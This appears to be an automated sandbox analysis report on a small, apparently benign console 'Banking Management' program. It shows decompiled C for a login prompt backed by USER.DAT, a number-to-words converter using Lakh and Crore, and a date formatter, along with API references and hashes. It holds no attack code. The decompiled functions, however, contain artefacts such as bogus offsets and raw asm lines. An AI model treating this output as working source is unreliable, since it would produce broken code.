0x00232adc
0x00232ae1
0x00232ae6
0x00232ae8
0x00232af1
0x00232afb
0x00232b01
0x00232b0a
0x00232b0a
0x00232a5d
0x00232a61
0x00232a6b
0x00232a71
0x00232a77
0x00232a7a
0x00232a7a
0x00232b0d
0x00232b21
0x00232b27
0x00232b2a
0x00232b36
0x00232b4c
0x00232b61
0x00232b67
0x00232b6d
0x00232b73
0x00000000
0x00000000
0x00232b75
0x00232b7c
0x00232b81
0x00232b81
0x00232b88
0x00232ba4
0x00232ba9
0x00232bae
0x00232bb3
0x00232bbd
0x00232bc4
0x00232bcd
0x00232bd3
0x00232bdc
0x00232be5
0x00232bfb
0x00232bfb
0x00232b42
0x00232b47
0x00000000

APIs

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 0023298D
scanf.MSVCRT ref: 002329A0
fopen.MSVCRT ref: 002329B3
fscanf.MSVCRT ref: 002329E4
_strupr.MSVCRT ref: 002329F6
strcpy.MSVCRT(?,00000000), ref: 00232A04
_strupr.MSVCRT ref: 00232A11
strcpy.MSVCRT(0023B244,00000000), ref: 00232A20
strcmp.MSVCRT ref: 00232A31
fclose.MSVCRT ref: 00232A4E
printf.MSVCRT ref: 00232A6B
printf.MSVCRT ref: 00232A90
strcpy.MSVCRT(0023B262,00000000,00000000), ref: 00232AAB
printf.MSVCRT ref: 00232AC1
strcmp.MSVCRT ref: 00232ADC
printf.MSVCRT ref: 00232AFB
fopen.MSVCRT ref: 00232B21
strcpy.MSVCRT(0023B240,U01,?,?,?,?,?,?,00000000), ref: 00232B42
fscanf.MSVCRT ref: 00232B67
fclose.MSVCRT ref: 00232B88
fopen.MSVCRT ref: 00232B9B
fprintf.MSVCRT ref: 00232BC4
fclose.MSVCRT ref: 00232BD3
printf.MSVCRT ref: 00232BEF

Strings

p5u:u@su, xrefs: 00232BC4
%s %s %s, xrefs: 00232BB8
Password : , xrefs: 00232A8B
Confirm Password : , xrefs: 00232ABC
USER.DAT, xrefs: 00232B96
USER.DAT, xrefs: 00232B1C
Record ADDED successfully!, xrefs: 00232BEA
%s %s %s, xrefs: 00232B5C
U01, xrefs: 00232B38
USER.DAT, xrefs: 002329AE
%s %s %s, xrefs: 002329D8
User Name : , xrefs: 00232988

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$strcpy$fclosefopenstrcmp$_strdate_struprfscanf$ConsoleCursorHandlePositionfprintfscanf
String ID: %s %s %s$%s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$U01$USER.DAT$USER.DAT$USER.DAT$User Name : $p5u:u@su
API String ID: 3308860163-3106795767
Opcode ID: c51bf1250e6144a556344a7bf910ff1b522aa09426f24c0f2b17c5da145ac9a7
Instruction ID: fba5230279d724363b466a180fe38769d4aed183f013dfb1b73e9e5281fd58b8
Opcode Fuzzy Hash: c51bf1250e6144a556344a7bf910ff1b522aa09426f24c0f2b17c5da145ac9a7
Instruction Fuzzy Hash: 8871A8F0E60304EFDB15DFA4EC4AB8E7774AF16705F040125FA05A6291DBB056B8CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00231E50, Relevance: 58.6, APIs: 20, Strings: 19, Instructions: 134
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00231E50(void* __ecx, signed int _a4, char* _a8) {
				signed int _v8;

				_v8 = _a4;
				_v8 = _v8 - 1;
				if(_v8 > 0x12) {
					return strcpy(_a8, 0x23b225);
				}
				switch( *((intOrPtr*)(_v8 * 4 +  &M00232020))) {
					case 0:
						return strcpy(_a8, "One ");
					case 1:
						__ecx = _a8;
						return strcpy(_a8, "Two ");
					case 2:
						return strcpy(_a8, "Three ");
					case 3:
						__eax = _a8;
						return strcpy(_a8, "Four ");
					case 4:
						__ecx = _a8;
						return strcpy(_a8, "Five ");
					case 5:
						return strcpy(_a8, "Six ");
					case 6:
						__eax = _a8;
						return strcpy(_a8, "Seven ");
					case 7:
						__ecx = _a8;
						return strcpy(_a8, "Eight ");
					case 8:
						return strcpy(_a8, "Nine ");
					case 9:
						__eax = _a8;
						return strcpy(_a8, "Ten ");
					case 0xa:
						__ecx = _a8;
						return strcpy(_a8, "Eleven ");
					case 0xb:
						return strcpy(_a8, "Tweleve ");
					case 0xc:
						__eax = _a8;
						return strcpy(_a8, "Thirteen ");
					case 0xd:
						__ecx = _a8;
						return strcpy(_a8, "Fourteen ");
					case 0xe:
						return strcpy(_a8, "Fifteen ");
					case 0xf:
						__eax = _a8;
						return strcpy(_a8, "Sixteen ");
					case 0x10:
						__ecx = _a8;
						return strcpy(_a8, "Seventeen ");
					case 0x11:
						return strcpy(_a8, "Eighteen ");
					case 0x12:
						__eax = _a8;
						return strcpy(_a8, "Nineteen ");
				}
			}

0x00231e57
0x00231e60
0x00231e67
0x00000000
0x00232015
0x00231e70
0x00000000
0x00000000
0x00000000
0x00231e92
0x00000000
0x00000000
0x00000000
0x00000000
0x00231ebe
0x00000000
0x00000000
0x00231ed4
0x00000000
0x00000000
0x00000000
0x00000000
0x00231f00
0x00000000
0x00000000
0x00231f16
0x00000000
0x00000000
0x00000000
0x00000000
0x00231f42
0x00000000
0x00000000
0x00231f58
0x00000000
0x00000000
0x00000000
0x00000000
0x00231f84
0x00000000
0x00000000
0x00231f9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00231fc0
0x00000000
0x00000000
0x00231fd3
0x00000000
0x00000000
0x00000000
0x00000000
0x00231ff9
0x00000000
0x00000000

APIs

strcpy.MSVCRT(00231C43,One ,?,?,00231C43,?), ref: 00231E80
strcpy.MSVCRT(?,Two ,?), ref: 00231E96
strcpy.MSVCRT(?,Three ,?,?,?,?), ref: 00231EAC
strcpy.MSVCRT(?,Four ,?,?,?,?,?,?), ref: 00231EC2
strcpy.MSVCRT(?,Five ,?,?,?,?,?,?,?,?), ref: 00231ED8
strcpy.MSVCRT(?,Six ,?,?,?,?,?,?,?,?,?,?), ref: 00231EEE
strcpy.MSVCRT(?,Seven ,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00231F04
strcpy.MSVCRT(?,Eight ,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00231F1A
strcpy.MSVCRT(?,Nine ), ref: 00231F30
strcpy.MSVCRT(?,Ten ), ref: 00231F46
strcpy.MSVCRT(?,Eleven ), ref: 00231F5C
strcpy.MSVCRT(?,Tweleve ), ref: 00231F72
strcpy.MSVCRT(?,Thirteen ), ref: 00231F88
strcpy.MSVCRT(?,Fourteen ), ref: 00231F9E
strcpy.MSVCRT(?,Fifteen ), ref: 00231FB1
strcpy.MSVCRT(?,Sixteen ), ref: 00231FC4
strcpy.MSVCRT(?,Seventeen ), ref: 00231FD7
strcpy.MSVCRT(?,Eighteen ), ref: 00231FEA
strcpy.MSVCRT(?,Nineteen ), ref: 00231FFD
strcpy.MSVCRT(00231C43,0023B225,?,?,00231C43,?), ref: 00232010

Strings

Ten , xrefs: 00231F3D
Fifteen , xrefs: 00231FA8
Fourteen , xrefs: 00231F95
Eight , xrefs: 00231F11
Sixteen , xrefs: 00231FBB
One , xrefs: 00231E77
Seventeen , xrefs: 00231FCE
Eleven , xrefs: 00231F53
Eighteen , xrefs: 00231FE1
Tweleve , xrefs: 00231F69
Thirteen , xrefs: 00231F7F
Three , xrefs: 00231EA3
Four , xrefs: 00231EB9
Five , xrefs: 00231ECF
Seven , xrefs: 00231EFB
Two , xrefs: 00231E8D
Nine , xrefs: 00231F27
Six , xrefs: 00231EE5
Nineteen , xrefs: 00231FF4

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: strcpy
String ID: Eight $Eighteen $Eleven $Fifteen $Five $Four $Fourteen $Nine $Nineteen $One $Seven $Seventeen $Six $Sixteen $Ten $Thirteen $Three $Tweleve $Two
API String ID: 3177657795-1665498770
Opcode ID: 0190d47a1ef9e5ad3781f6798dde7779363ae8ea089f24e483f2bd475fe3cf28
Instruction ID: 0ea6ee545e835b7a8d88a8d46d6b6a6beb11fdff9f005587e5650ef3a86ba3f7
Opcode Fuzzy Hash: 0190d47a1ef9e5ad3781f6798dde7779363ae8ea089f24e483f2bd475fe3cf28
Instruction Fuzzy Hash: B54165F9B78304F7CA289AA0ECC2C5D33155B76701F148A16B84916341E5B5EB3DEBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00231410, Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 209
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00231410(long long __fp0, char* _a4, char _a12245929) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long long _v36;
				long long _v44;
				signed int _v48;
				char _v52;
				signed int _v56;
				char _v72;
				signed int _t138;
				signed int _t160;
				void* _t165;
				void* _t166;
				void* _t167;
				long long _t177;

				_t177 = __fp0;
				_v56 = (_a4[3] - 0x30) * 0xa +  *((char*)(_a4 + (1 << 2))) - 0x30;
				_v20 = ( *_a4 - 0x30) * 0xa + _a4[1] - 0x30;
				_v48 = (_a4[6] - 0x30) * 0xa + _a4[7] + 0x7a0;
				_v12 = _v20;
				_v12 = _v12 - 1;
				if(_v12 <= 0xb) {
					switch( *((intOrPtr*)(_v12 * 4 +  &M00231700))) {
						case 0:
							strcpy( &_v52, "Jan");
							_t166 = _t166 + 8;
							goto L14;
						case 1:
							strcpy( &_v52, "Feb");
							goto L14;
						case 2:
							strcpy( &_v52, "Mar");
							goto L14;
						case 3:
							strcpy( &_v52, "Apr");
							goto L14;
						case 4:
							strcpy( &_v52, "May");
							goto L14;
						case 5:
							strcpy( &_v52, "Jun");
							goto L14;
						case 6:
							strcpy( &_v52, "Jul");
							goto L14;
						case 7:
							strcpy( &_v52, "Aug");
							goto L14;
						case 8:
							strcpy( &_v52, "Sep");
							goto L14;
						case 9:
							strcpy( &_v52, "Oct");
							goto L14;
						case 0xa:
							strcpy( &_v52, "Nov");
							goto L14;
						case 0xb:
							strcpy( &_v52, "Dec");
							goto L14;
					}
				}
				L14:
				asm("cdq");
				 *((char*)(_t165 + 0xffffffffffffffbc)) = _v56 / 0xa + 0x30;
				asm("cdq");
				 *((char*)(_t165 + 0xbadb69)) = _v56 % 0xa + 0x30;
				 *((char*)(_t165 + 0xbadb69)) = 0x20;
				 *((char*)(_t165 + 0xffffffffffffffbf)) = 0;
				strcat( &_v72,  &_v52);
				_t167 = _t166 + 8;
				_t160 = 6;
				_a12245929 = 0x2c;
				_v16 = 0;
				 *((char*)(_t165 + 0xffffffffffffffc3)) = 0x20;
				_v8 = 3;
				while(_v8 >= 0) {
					asm("cvtsi2sd xmm0, dword [ebp-0x2c]");
					asm("cvtsi2sd xmm1, dword [ebp-0x4]");
					asm("movsd [esp], xmm1");
					asm("movsd xmm1, [0x238120]");
					asm("movsd [esp], xmm1");
					asm("movsd [ebp-0x18], xmm0");
					L00237C82();
					_v36 = _t177;
					asm("movsd xmm0, [ebp-0x18]");
					asm("divsd xmm0, [ebp-0x20]");
					asm("cvttsd2si edx, xmm0");
					 *((char*)(_t165 + _v16 - 0x3c)) = _t160 + 0x30;
					_t138 = _v16 + 1;
					_v16 = _t138;
					asm("cvtsi2sd xmm0, dword [ebp-0x4]");
					asm("movsd [esp], xmm0");
					asm("movsd xmm0, [0x238120]");
					asm("movsd [esp], xmm0");
					L00237C82();
					_t167 = _t167 + 0x10 + 0x10;
					_v44 = _t177;
					asm("movsd xmm0, [ebp-0x28]");
					asm("cvttsd2si ecx, xmm0");
					asm("cdq");
					_t160 = _v48 % _t138;
					_v48 = _t160;
					_v8 = _v8 - 1;
				}
				 *((char*)(_t165 + 0xffffffffffffffc8)) = 0;
				return strcpy(_a4,  &_v72);
			}

0x00231410
0x0023143e
0x00231469
0x00231497
0x0023149d
0x002314a6
0x002314ad
0x002314b6
0x00000000
0x002314c6
0x002314cb
0x00000000
0x00000000
0x002314dc
0x00000000
0x00000000
0x002314f2
0x00000000
0x00000000
0x00231508
0x00000000
0x00000000
0x0023151e
0x00000000
0x00000000
0x00231534
0x00000000
0x00000000
0x00231547
0x00000000
0x00000000
0x0023155a
0x00000000
0x00000000
0x0023156d
0x00000000
0x00000000
0x00231580
0x00000000
0x00000000
0x00231593
0x00000000
0x00000000
0x002315a6
0x00000000
0x00000000
0x002314b6
0x002315ae
0x002315b1
0x002315c4
0x002315cb
0x002315de
0x002315e9
0x002315f6
0x00231603
0x00231608
0x00231610
0x00231613
0x00231618
0x00231627
0x0023162c
0x0023163e
0x00231648
0x0023164d
0x00231655
0x0023165d
0x00231665
0x0023166a
0x0023166f
0x00231677
0x0023167a
0x0023167f
0x00231684
0x0023168e
0x00231695
0x00231698
0x0023169b
0x002316a3
0x002316ab
0x002316b3
0x002316b8
0x002316bd
0x002316c0
0x002316c3
0x002316c8
0x002316cf
0x002316d0
0x002316d2
0x0023163b
0x0023163b
0x002316e2
0x002316fa

APIs

strcpy.MSVCRT(?,Jan), ref: 002314C6
strcpy.MSVCRT(?,Feb), ref: 002314DC
strcpy.MSVCRT(?,Mar), ref: 002314F2
strcpy.MSVCRT(?,Apr), ref: 00231508
strcpy.MSVCRT(?,May), ref: 0023151E
strcpy.MSVCRT(?,Jun), ref: 00231534
strcpy.MSVCRT(?,Jul), ref: 00231547
strcpy.MSVCRT(?,Aug), ref: 0023155A
strcpy.MSVCRT(?,Sep), ref: 0023156D
strcpy.MSVCRT(?,Oct), ref: 00231580
strcpy.MSVCRT(?,Nov), ref: 00231593
strcpy.MSVCRT(?,Dec), ref: 002315A6
strcat.MSVCRT(00000000,?), ref: 00231603
pow.MSVCRT ref: 0023166F
pow.MSVCRT ref: 002316B8
strcpy.MSVCRT(0000000B,00000000), ref: 002316EF

Strings

Jan, xrefs: 002314BD
Jun, xrefs: 0023152B
Oct, xrefs: 00231577
Dec, xrefs: 0023159D
Mar, xrefs: 002314E9
Sep, xrefs: 00231564
May, xrefs: 00231515
, xrefs: 00231627
Apr, xrefs: 002314FF
Feb, xrefs: 002314D3
Jul, xrefs: 0023153E
Aug, xrefs: 00231551
Nov, xrefs: 0023158A

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: strcpy$strcat
String ID: $Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
API String ID: 3927648046-2641305345
Opcode ID: 50d0ab4d9ff39b21de42d7166adc25e4a223db886e90a655e6c1a87c3e115a6a
Instruction ID: f6680ae31f4b8c49e8b863ab027b11f0a28196120ce084483dcc0a059e24c644
Opcode Fuzzy Hash: 50d0ab4d9ff39b21de42d7166adc25e4a223db886e90a655e6c1a87c3e115a6a
Instruction Fuzzy Hash: 47811DF1E2420CDFCB08DFA8D991AEDBB76EF46300F18562EF40266380E6759664CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00231A20, Relevance: 48.3, APIs: 25, Strings: 7, Instructions: 340
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00231A20(char* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v28;
				signed int _v32;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				char _v45;
				short _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v92;
				int _v96;
				void _v171;
				char _v172;
				void* _t192;
				int _t218;
				int _t221;
				void* _t350;
				void* _t351;
				void* _t352;
				void* _t354;

				_v64 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v45 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v172 = 0;
				_t192 = memset( &_v171, 0, 0x31);
				_t352 = _t351 + 0xc;
				asm("cvttsd2si eax, [ebp+0x8]");
				_v16 = _t192;
				asm("cdq");
				 *(_t350 + 0xffffffffffffffa0) = _v16 % 0x3e8;
				asm("cdq");
				_v16 = _v16 / 0x3e8;
				_v8 = 4;
				while(_v8 >= 0) {
					asm("cdq");
					 *(_t350 + _v8 * 4 - 0x74) = _v16 % 0x64;
					asm("cdq");
					_v16 = _v16 / 0x64;
					_v8 = _v8 - 1;
				}
				_v76 =  *(_t350 + 0xffffffffffffffa0);
				asm("cdq");
				_v32 = _v76 / 0x64;
				asm("cdq");
				_v12 = _v76 % 0x64;
				asm("cdq");
				_v72 = _v12 / 0xa;
				asm("cdq");
				_v80 = _v12 % 0xa;
				if(_v12 >= 0x14 || _v32 == 0) {
					if(_v12 >= 0x14 || _v32 != 0) {
						if(_v12 <= 0x14 || _v32 == 0) {
							E00232070( &_v92, _v72,  &_v92);
							strcpy( &_v64,  &_v92);
							E00231E50( &_v64, _v80,  &_v28);
							strcat( &_v64,  &_v28);
							_t354 = _t352 + 0x10;
						} else {
							E00231E50(_v32, _v32,  &_v28);
							strcpy( &_v64,  &_v28);
							strcat( &_v64, "Hundred ");
							E00232070( &_v64, _v72,  &_v92);
							strcat( &_v64,  &_v92);
							E00231E50(_v80, _v80,  &_v28);
							strcat( &_v64,  &_v28);
							_t354 = _t352 + 0x20;
						}
					} else {
						E00231E50(0xa, _v12,  &_v28);
						strcpy( &_v64,  &_v28);
						_t354 = _t352 + 8;
					}
				} else {
					E00231E50(0xa, _v32,  &_v28);
					strcpy( &_v64,  &_v28);
					strcat( &_v64, "Hundred ");
					E00231E50( &_v28, _v12,  &_v28);
					strcat( &_v64,  &_v28);
					_t354 = _t352 + 0x18;
				}
				_v8 = 4;
				while(_v8 >= 0) {
					if( *(_t350 + _v8 * 4 - 0x74) >= 0x14) {
						asm("cdq");
						E00232070(0xa,  *(_t350 + _v8 * 4 - 0x74) / 0xa,  &_v92);
						strcpy(_t350 + _v8 * 0x1e - 0x140,  &_v92);
						asm("cdq");
						E00231E50(0xa,  *(_t350 + _v8 * 4 - 0x74) % 0xa,  &_v28);
						strcat(_t350 + _v8 * 0x1e - 0x140,  &_v28);
						_t354 = _t354 + 0x10;
					} else {
						E00231E50( *(_t350 + _v8 * 4 - 0x74),  *(_t350 + _v8 * 4 - 0x74),  &_v28);
						strcpy(_t350 + _v8 * 0x1e - 0x140,  &_v28);
						_t354 = _t354 + 8;
					}
					_v8 = _v8 - 1;
				}
				_v8 = 0;
				while(_v8 < 5) {
					_t221 = strlen(_t350 + _v8 * 0x1e - 0x140);
					_t354 = _t354 + 4;
					_v96 = _t221;
					if(_v96 != 0) {
						_v68 = _v8;
						if(_v68 <= 4) {
							switch( *((intOrPtr*)(_v68 * 4 +  &M00231E38))) {
								case 0:
									strcpy( &_v44, "Kharab ");
									_t354 = _t354 + 8;
									goto L32;
								case 1:
									strcpy( &_v44, "Arab ");
									goto L32;
								case 2:
									strcpy( &_v44, "Crore ");
									goto L32;
								case 3:
									__ecx =  &_v44;
									strcpy( &_v44, "Lakh ");
									goto L32;
								case 4:
									strcpy( &_v44, "Thousand ");
									goto L32;
							}
						}
						L32:
						strcat( &_v172, _t350 + _v8 * 0x1e - 0x140);
						strcat( &_v172,  &_v44);
						_t354 = _t354 + 0x10;
					}
					_v8 = _v8 + 1;
				}
				strcpy(_a12,  &_v172);
				strcat(_a12,  &_v64);
				_t218 = strlen(_a12);
				_a12[_t218 - 1] = 0;
				return _t218;
			}

0x00231a29
0x00231a2f
0x00231a32
0x00231a35
0x00231a38
0x00231a3b
0x00231a3f
0x00231a42
0x00231a48
0x00231a4b
0x00231a4e
0x00231a51
0x00231a63
0x00231a68
0x00231a6b
0x00231a70
0x00231a76
0x00231a86
0x00231a8d
0x00231a95
0x00231a98
0x00231aaa
0x00231ab3
0x00231abe
0x00231ac5
0x00231acd
0x00231aa7
0x00231aa7
0x00231ade
0x00231ae4
0x00231aec
0x00231af2
0x00231afa
0x00231b00
0x00231b08
0x00231b0e
0x00231b16
0x00231b1d
0x00231b79
0x00231ba7
0x00231c21
0x00231c2e
0x00231c3e
0x00231c4b
0x00231c50
0x00231baf
0x00231bb7
0x00231bc4
0x00231bd5
0x00231be5
0x00231bf2
0x00231c02
0x00231c0f
0x00231c14
0x00231c14
0x00231b81
0x00231b89
0x00231b96
0x00231b9b
0x00231b9b
0x00231b25
0x00231b2d
0x00231b3a
0x00231b4b
0x00231b5b
0x00231b68
0x00231b6d
0x00231b6d
0x00231c53
0x00231c65
0x00231c77
0x00231cb1
0x00231cba
0x00231cd1
0x00231ce4
0x00231ced
0x00231d04
0x00231d09
0x00231c79
0x00231c85
0x00231c9c
0x00231ca1
0x00231ca1
0x00231c62
0x00231c62
0x00231d11
0x00231d23
0x00231d3b
0x00231d40
0x00231d43
0x00231d4a
0x00231d53
0x00231d5a
0x00231d5f
0x00000000
0x00231d6f
0x00231d74
0x00000000
0x00000000
0x00231d82
0x00000000
0x00000000
0x00231d95
0x00000000
0x00000000
0x00231da4
0x00231da8
0x00000000
0x00000000
0x00231dbb
0x00000000
0x00000000
0x00231d5f
0x00231dc3
0x00231dd8
0x00231deb
0x00231df0
0x00231df0
0x00231d20
0x00231d20
0x00231e03
0x00231e13
0x00231e1f
0x00231e2a
0x00231e32

APIs

memset.MSVCRT ref: 00231A63
strcpy.MSVCRT(00000000,?,00000000,?), ref: 00231B3A
strcat.MSVCRT(00000000,Hundred ,00000000,?), ref: 00231B4B
strcat.MSVCRT(00000000,?,00000014,?,?,?,00000000,?), ref: 00231B68
strcpy.MSVCRT(00000000,?,00000014,?), ref: 00231B96
strcpy.MSVCRT(00000000,?,00000000,?), ref: 00231BC4
strcat.MSVCRT(00000000,Hundred ,00000000,?), ref: 00231BD5
strcat.MSVCRT(00000000,?,?,?,?,?,00000000,?), ref: 00231BF2
strcat.MSVCRT(00000000,?,?,?,?,?,?,?,00000000,?), ref: 00231C0F
strcpy.MSVCRT(00000000,?,?,?), ref: 00231C2E
strcat.MSVCRT(00000000,?,?,?,?,?), ref: 00231C4B
strcpy.MSVCRT(?,?,00000014,?,?,?,00000014,?,?,?,?,?), ref: 00231C9C
strcpy.MSVCRT(?,?,00000014,?,?,?,?,?), ref: 00231CD1
strcat.MSVCRT(?,?,?,?,00000014,?,?,?,?,?), ref: 00231D04
strlen.MSVCRT ref: 00231D3B
strcpy.MSVCRT(00000000,Kharab ,?,?,?,?,?,?), ref: 00231D6F
strcpy.MSVCRT(00000000,Arab ,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00231D82
strcpy.MSVCRT(00000000,Crore ,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00231D95
strcat.MSVCRT(00000000,?,?,?,?,?,?,?), ref: 00231DD8
strcat.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?), ref: 00231DEB
strcpy.MSVCRT(?,00000000,?,?,?,?), ref: 00231E03
strcat.MSVCRT(?,00000000,?,?,?,?,?,?), ref: 00231E13
strlen.MSVCRT ref: 00231E1F

Strings

Lakh , xrefs: 00231D9F
Kharab , xrefs: 00231D66
Hundred , xrefs: 00231BCC
Hundred , xrefs: 00231B42
Arab , xrefs: 00231D79
Thousand , xrefs: 00231DB2
Crore , xrefs: 00231D8C

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: strcatstrcpy$strlen$memset
String ID: Arab $Crore $Hundred $Hundred $Kharab $Lakh $Thousand
API String ID: 2193452661-1289526402
Opcode ID: 2a8c9278a84700d3723d4958020551a0715560e3458e094508ae2d7535135e5b
Instruction ID: ab1118c4df7ffac0032056192c33e6daf0c7977ae3c2858a1fff144cc57f1b42
Opcode Fuzzy Hash: 2a8c9278a84700d3723d4958020551a0715560e3458e094508ae2d7535135e5b
Instruction Fuzzy Hash: 37D184F1D20208EBCF08DFE8D885ADDB7B9AF59300F148929F505A7240EB759A65CF61

Uniqueness

Uniqueness Score: -1.00%

Function 002323F0, Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 67
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E002323F0(void* __ecx, long long __fp0) {
				intOrPtr _v8;
				int _t9;
				intOrPtr _t14;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				long long _t31;

				_t31 = __fp0;
				E002310D0(0, 0, 0x50, 0x17);
				E00231000(0x19, 1);
				printf("Banking Management //");
				E00231000(5, 3);
				_t9 = strcmp(0x23b244, "Admin");
				_t21 = _t19 + 0xc;
				if(_t9 == 0) {
					 *0x23b220 = 1;
				}
				if( *0x23b220 == 0) {
					_push(0x23b244);
					printf("Current User : %s");
					_t22 = _t21 + 8;
				} else {
					printf("Current User : Admin");
					_t22 = _t21 + 4;
				}
				printf("\t\t\t\tDate : ");
				__imp___strdate(0x23b2a0);
				E00231410(_t31, 0x23b2a0);
				printf("%s");
				__imp___strdate(0x23b2a0, 0x23b2a0);
				_t26 = _t22 + 0x14;
				_t14 = E00231000(1, 5);
				_v8 = 0;
				while(_v8 < 0x4e) {
					_push(0xc4);
					printf("%c");
					_t26 = _t26 + 8;
					_t14 = _v8 + 1;
					_v8 = _t14;
				}
				return _t14;
			}

0x002323f0
0x002323fc
0x00232405
0x0023240f
0x0023241c
0x0023242b
0x00232430
0x00232435
0x00232437
0x00232437
0x00232448
0x0023245a
0x00232464
0x0023246a
0x0023244a
0x0023244f
0x00232455
0x00232455
0x00232472
0x00232480
0x0023248e
0x0023249d
0x002324ab
0x002324b1
0x002324b8
0x002324bd
0x002324cf
0x002324d5
0x002324df
0x002324e5
0x002324c9
0x002324cc
0x002324cc
0x002324ed

APIs

Part of subcall function 002310D0: printf.MSVCRT ref: 002310ED
Part of subcall function 002310D0: printf.MSVCRT ref: 0023112C
Part of subcall function 002310D0: printf.MSVCRT ref: 0023114E
Part of subcall function 002310D0: printf.MSVCRT ref: 002311C3
Part of subcall function 002310D0: printf.MSVCRT ref: 002311E7

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 0023240F
strcmp.MSVCRT ref: 0023242B
printf.MSVCRT ref: 0023244F
printf.MSVCRT ref: 00232464
printf.MSVCRT ref: 00232472
_strdate.MSVCRT ref: 00232480
printf.MSVCRT ref: 0023249D
_strdate.MSVCRT ref: 002324AB
printf.MSVCRT ref: 002324DF

Strings

Current User : Admin, xrefs: 0023244A
Current User : %s, xrefs: 0023245F
Date : , xrefs: 0023246D
Admin, xrefs: 00232421
N, xrefs: 002324CF
Banking Management //, xrefs: 0023240A

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$_strdate$ConsoleCursorHandlePositionstrcmp
String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
API String ID: 1102874408-644830535
Opcode ID: 3b0522a478674ed8553711788fe5bee56d2175e7f613fde9e8090821c43393dd
Instruction ID: 88131636abc9a106cb5d1d2dea3fde29dffa7792bf2ff3ad5c3b6d47d11f98d5
Opcode Fuzzy Hash: 3b0522a478674ed8553711788fe5bee56d2175e7f613fde9e8090821c43393dd
Instruction Fuzzy Hash: E71133F07B0304FBE6146B64BD0FB5A36206B12B0AF154120FF4AB91D1DAE165789967

Uniqueness

